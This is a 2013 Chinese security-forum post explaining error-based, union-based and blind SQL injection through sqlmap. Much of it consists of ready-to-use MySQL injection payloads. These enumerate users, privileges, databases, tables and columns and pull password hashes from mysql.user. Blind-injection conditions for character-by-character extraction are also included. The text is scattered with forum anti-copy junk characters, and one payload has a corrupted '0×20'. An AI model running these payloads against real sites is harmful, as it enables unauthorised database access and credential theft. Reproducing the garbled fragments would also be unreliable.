找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2226|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。: S2 n, O/ C$ G# ^/ ~6 G+ {
$ L/ V- I  I. f  G
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
% q3 ^9 n' o6 `) j$ [7 d. C0 c
6 g; M: X) U+ O, l! V分类标准        分类        备注
3 S% l3 l& @* T按字段类型        整型注入,字符型注入        + _3 Q7 B9 H5 k/ O3 t
按出现的位置        get注入,post注入,cookie注入,http header注入       
# ]2 B- n. u+ D1 ]然而高级注入是这样的
* K- E. V4 F3 L/ f% S1 h1 a3 I
6 R$ d! a& d" G3 f% G  c高级注入分类        条件
! h( X; G) }* H4 W1 Uerror-based sql        数据库的错误回显可以返回,存在数据库,表结构
, ]" C; @3 s; D$ S  x5 m7 Uunion-based sql        能够使用union,存在数据库,表结构+ @; Z9 S! o7 C3 y( B
blind sql        存在注入# w5 F4 s- a' s2 [
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。. k2 c* A: x6 _( ?( ]

) I7 P5 Q* t9 t8 ~- O好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火0 p! w+ q2 o4 |& Q. i8 V; e

% D5 C' y: ~) a, N' x" }) q附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。  O; L1 }3 f, U7 r9 h0 O  q$ C0 f2 R

7 b& c; R+ k  B1 i5 ^7 q' [这里用mysql说明2 _9 _8 E, u6 H+ y$ [1 y6 O

: p+ V" s, U& o  Y% O9 ~8 P1 }e注入坛子里很多了,请看戳我或者再戳我
1 S) ?" n  ]$ h- W( F: K4 H5 Q
4 U& e1 E$ x( r% Y6 Y; a$ pu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的$ _3 P$ n2 G6 t8 A2 z

. v# S/ Q# F+ r; `; |" a' ]获取当前数据库用户名* M' P0 f  `' m! T
0 O6 N, g4 c9 g$ V! L, d' i* r
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C, ^. K9 t( g. t; B( j2 I8 x# k
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL6 W' j- z, k% L2 l5 r; r# F
L, NULL#( P1 L) R" ]1 z4 c7 n
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
# |. p3 D$ S( Z' N
! i" r- T8 o9 ]- \( y$ M  }获取数据库名- }$ D# J/ A' G1 t
" T7 y2 Q% X2 p! B# r" A
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#  R2 g6 q- f- V8 B  |
获取所有用户名5 y" T4 X2 a. T0 j
" b% ?; p# y9 t
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#7 U. V3 H- u5 ]) S6 t
查看当前用户权限
) i' C( C2 v" ]2 B7 D9 ]+ M 2 E9 U# j8 T) h( t3 B9 |
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#% T, G) \- @' V7 v8 H  L3 @
尝试获取密码,当然需要有能读mysql数据库的权限: X0 D5 C, H6 w0 m5 U+ T3 |

7 |5 E: J' G* Y0 W; I" MUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
& ?, _5 }% |. T% R获取表名,limit什么的自己搞啦
5 d4 Q  n0 K& J! N1 e : t% o2 _# @' {( N8 ~4 J% v
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#1 T9 X- u- n5 _+ @  d# ]1 s- P
获取字段名及其类型4 C. s3 `, P- ~2 j- b; |/ h* [
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#! l  [; R/ y5 K3 Z' z

& h) l2 Z+ \0 J4 t! q* N( mb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
- w# y- F8 N* {& }9 ? ( g! i- h! Q0 O- m: E- ?- R
如:
: E7 W3 U5 y, r4 @8 A获取当前用户名
9 o9 @: H; {. V9 ^$ x ! t- ^( Q& W6 Y% P& ~" E0 }& S
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116+ N; g9 q! M/ i, B' w
获取当前数据库
3 V. @4 d; x) P, E% h ! r" d( C+ i8 u( j
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106( _, B3 J4 N; y' T
获取表名
6 J% W$ m% [; H" b  G ' n- z! M1 r# X9 p3 `" b, A
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 518 ]* C7 Y% _1 C
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
5 |% X8 p: B! i' G/ s7 A+ h回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。/ p- M4 l7 @! B) A8 E+ V
爆表/ @, V2 G; f# v* v

8 Y9 }+ E  t6 I' _& o6 JAND EXISTS(select * from table)8 u  x" K6 H: A/ y1 K3 s
爆字段% }' J, [* b/ U& J" c

2 V* P( d- t( pAND EXISTS(select pwd from table). j4 [' j6 ?, q: K
盲注的变化就比较多了,由于篇幅,只是举个例子而已。0 w7 l, u- l1 y/ c  P. {' Z

) u0 q0 d; y' x7 e本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
2 C) U$ j2 E, @- ^# m! c9 ^9 s; T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表